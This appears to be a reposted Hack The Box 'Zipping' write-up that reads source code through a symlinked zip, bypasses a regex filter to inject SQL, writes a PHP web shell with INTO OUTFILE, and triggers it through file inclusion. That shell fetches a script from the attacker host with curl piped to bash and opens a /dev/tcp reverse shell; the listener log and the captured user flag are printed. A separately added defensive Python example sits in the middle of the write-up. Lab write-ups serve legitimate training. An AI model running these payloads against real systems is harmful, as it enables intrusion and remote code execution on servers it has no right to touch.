HTB Zipping Notes: A New Way to Get a Shell

admin · 2023-09-10 23:32:29 · 460 views


First generate the malicious pdf (a zip containing a symlink named lol.pdf that points at product.php), then capture the request with Burp Suite and read the contents of product.php out of the response:

ln -s /var/www/html/shop/product.php lol.pdf
zip --symlinks lol.zip lol.pdf


product.php source:

<?php
// Check to make sure the id parameter is specified in the URL
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    // Filtering user input for letters or special characters
    if(preg_match("/^.*[A-Za-z!#$%^&*()-_=+{}[]\|;:'\",.<>/?]|[^0-9]$/", $id, $match)) {
        header('Location: index.php');
    } else {
        // Prepare statement and execute, but does not prevent SQL injection
        $stmt = $pdo->prepare("SELECT * FROM products WHERE id = '$id'");
        $stmt->execute();
        // Fetch the product from the database and return the result as an Array
        $product = $stmt->fetch(PDO::FETCH_ASSOC);
        // Check if the product exists (array is not empty)
        if (!$product) {
            // Simple error to display if the id for the product doesn't exist (array is empty)
            exit('Product does not exist!');
        }
    }
} else {
    // Simple error to display if the id wasn't specified
    exit('No ID provided!');
}
?>
<?=template_header('Zipping | Product')?>
<div class="product content-wrapper">
    <img src="assets/imgs/<?=$product['img']?>" width="500" height="500" alt="<?=$product['name']?>">
    <div>
        <h1 class="name"><?=$product['name']?></h1>
        <span class="price">
            &dollar;<?=$product['price']?>
            <?php if ($product['rrp'] > 0): ?>
            <span class="rrp">&dollar;<?=$product['rrp']?></span>
            <?php endif; ?>
        </span>
        <form action="index.php?page=cart" method="post">
            <input type="number" name="quantity" value="1" min="1" max="<?=$product['quantity']?>" placeholder="Quantity" required>
            <input type="hidden" name="product_id" value="<?=$product['id']?>">
            <input type="submit" value="Add To Cart">
        </form>
        <div class="description">
            <?=$product['desc']?>
        </div>
    </div>
</div>
<?=template_footer()?>

The comment in the code itself says the SQL statement is vulnerable to SQL injection, and the regex check can be bypassed with a newline: the first part, /^.*[A-Za-z!#$%^&*()-_=+{}[]\|;:'",.<>/?], only looks at the first line (bypass it by starting the value with a newline, %0A), and the second part, [^0-9]$/, only checks that the payload ends with a digit (bypass it by ending with #1, i.e. %231; the # starts a MySQL comment, so the trailing 1 never reaches the query).
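To show the same regex weakness from the defender's side, here is an added Python example (not code from the writeup or from the box itself): it transcribes the product.php check, demonstrates why a value that starts with a newline and ends with a digit passes it, and pairs a digits-only allow-list with a bound query parameter. The products table and the sample inputs are constructed for the demo.

```python
import re
import sqlite3

# The product.php check from the writeup, transcribed for Python's re module.
# The "[" inside the class is escaped only so re does not warn about a nested
# set; PCRE and re parse the expression the same way either way.
WEAK_ID_PATTERN = re.compile(r"""^.*[A-Za-z!#$%^&*()-_=+{}\[]\|;:'",.<>/?]|[^0-9]$""")


def weak_check_rejects(product_id: str) -> bool:
    """Mirror product.php: a match means 'redirect to index.php', i.e. reject.
    '.' never crosses a newline and '$' only matches at the end, so a value
    that starts with a newline and ends with a digit slips through."""
    return WEAK_ID_PATTERN.search(product_id) is not None

def strict_check_rejects(product_id: str) -> bool:
    """Allow-list check: the whole value must be digits and nothing else.
    fullmatch() anchors at the true string ends, so '1\\n' is rejected too."""
    return re.fullmatch(r"[0-9]+", product_id) is None

def dollar_allows_trailing_newline(value: str) -> bool:
    """The anchor pitfall behind the bypass: '$' alone still accepts '1\\n'."""
    return re.match(r"[0-9]+$", value) is not None

def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the shop's products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "Laptop"), (2, "Phone")])
    return conn

def lookup_product(conn: sqlite3.Connection, product_id: str):
    """Hardened lookup: validate, then bind the id as a query parameter so the
    database never treats user input as SQL (unlike "... id = '$id'")."""
    if strict_check_rejects(product_id):
        return None
    return conn.execute("SELECT id, name FROM products WHERE id = ?",
                        (int(product_id),)).fetchone()


if __name__ == "__main__":
    # Constructed input shaped like the writeup's bypass: leading newline,
    # a quote to leave the string literal, and a trailing "#1" comment.
    sample = "\n' OR 1=1 #1"
    print("weak check rejects it:", weak_check_rejects(sample))      # False
    print("strict check rejects it:", strict_check_rejects(sample))  # True
    print(lookup_product(make_demo_db(), "2"))                       # (2, 'Phone')
```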


Write a file and execute it through the LFI: first create the shell script, then start a Python web server to serve it and a listener to wait for the reverse shell.

echo "bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'" > rev.sh
python3 -m http.server 80
nc -lvnp 4444
curl -s $'http://zipping.htb/shop/index.php?page=product&id=%0A\'%3bselect+\'<%3fphp+system("curl+http%3a//10.10.14.22/rev.sh|bash")%3b%3f>\'+into+outfile+\'/var/lib/mysql/breached.php\'+%231'
curl -s $'http://zipping.htb/shop/index.php?page=..%2f..%2f..%2f..%2f..%2fvar%2flib%2fmysql%2fbreached'


Successfully got the user flag: c41c61d3d2252776ca84fd7d1a29b466

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.229] 36748
bash: cannot set terminal process group (1125): Inappropriate ioctl for device
bash: no job control in this shell
rektsu@zipping:/var/www/html/shop$ id
id
uid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)
rektsu@zipping:/var/www/html/shop$ data
data
bash: data: command not found
rektsu@zipping:/var/www/html/shop$ time
time

real    0m0.000s
user    0m0.000s
sys     0m0.000s
rektsu@zipping:/var/www/html/shop$ data
data
bash: data: command not found
rektsu@zipping:/var/www/html/shop$ cat /home/rektsu/user.txt
cat /home/rektsu/user.txt
c41c61d3d2252776ca84fd7d1a29b466
rektsu@zipping:/var/www/html/shop$



Originally published on the WeChat public account hades zorejt: HTB Zipping Notes: A New Way to Get a Shell

Posted by admin on 2023-09-10 23:32:29. Please keep this article's link when reposting (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/2023189.html